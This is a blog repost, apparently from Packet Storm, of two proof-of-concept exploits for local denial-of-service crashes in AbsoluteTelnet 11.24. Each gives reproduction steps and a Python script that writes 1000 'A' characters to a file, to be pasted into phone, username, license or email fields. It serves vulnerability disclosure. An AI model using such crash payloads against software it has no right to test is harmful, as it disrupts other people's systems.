Home AbsoluteTelnet 11.24
Post
Cancel

AbsoluteTelnet 11.24

Posted Nov 11, 2021 Updated Apr 13, 2023
By Williams A. Danso
2 min read

Multiple denial-of-service vulnerabilities exist in AbsoluteTelnet version 11.24.

1

MD5 | c4916606f4a527de1d97ff6c1c0f4553

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77

    # Exploit Title: AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)
    # Discovered by: Yehia Elghaly
    # Discovered Date: 2021-11-10
    # Vendor Homepage: https://www.celestialsoftware.net/
    # Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe
    # Tested Version: 11.24
    # Vulnerability Type: Denial of Service (DoS) Local
    # Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64
    
    # Description: AbsoluteTelnet 11.24 - 'DialUp/Phone' & license name Denial of Service (PoC)
    
    # Steps to reproduce:
    # 1. - Download and install AbsoluteTelnet
    # 2. - Run the python script and it will create exploit.txt file.
    # 3. - Open AbsoluteTelnet 11.24
    # 4. - "new connection file -> DialUp Connection
    # 5. - Paste the characters of txt file to "DialUp  -> phone"
    # 6. - press "ok" button
    # 7. - Crashed
    # 8. - Reopen AbsoluteTelnet 11.24
    # 9. - Copy the same characters to "license name"
    # 10.- Click "Send Error Report" button
    # 11.- Crashed
    
    #!/usr/bin/python
    
    exploit = 'A' * 1000
    
    try:
        file = open("exploit.txt","w")
        file.write(exploit)
        file.close()
    
        print("POC is created")
    except:
        print("POC not created")
    
    
    ------
    
    # Exploit Title: AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)
    # Discovered by: Yehia Elghaly
    # Discovered Date: 2021-11-10
    # Vendor Homepage: https://www.celestialsoftware.net/
    # Software Link: https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe
    # Tested Version: 11.24
    # Vulnerability Type: Denial of Service (DoS) Local
    # Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64
    
    # Description: AbsoluteTelnet 11.24 - 'SHA1/SHA2/Username' and 'Error Report' Denial of Service (PoC)
    
    # Steps to reproduce:
    # 1. - Download and install AbsoluteTelnet
    # 2. - Run the python script and it will create exploit.txt file.
    # 3. - Open AbsoluteTelnet 11.24
    # 4. - "new connection file -> Connection -> SSH1 & SSH2"
    # 5. - Paste the characters of txt file to "Authentication -> Username"
    # 6. - press "ok" button
    # 7. - Crashed
    # 8. - Reopen AbsoluteTelnet 11.24
    # 9. - Copy the same characters to "Your Email Address (optional)"
    # 10.- Click "Send Error Report" button
    # 11.- Crashed
    
    
    #!/usr/bin/python
    
    exploit = 'A' * 1000
    
    try:
        file = open("exploit.txt","w")
        file.write(exploit)
        file.close()
    
        print("POC is created")
    except:
        print("POC not created")


Source :   https://packetstormsecurity.com

Exploits, Denial of Service (DoS)
exploits
This post is licensed under CC BY 4.0 by the author.
Recently Updated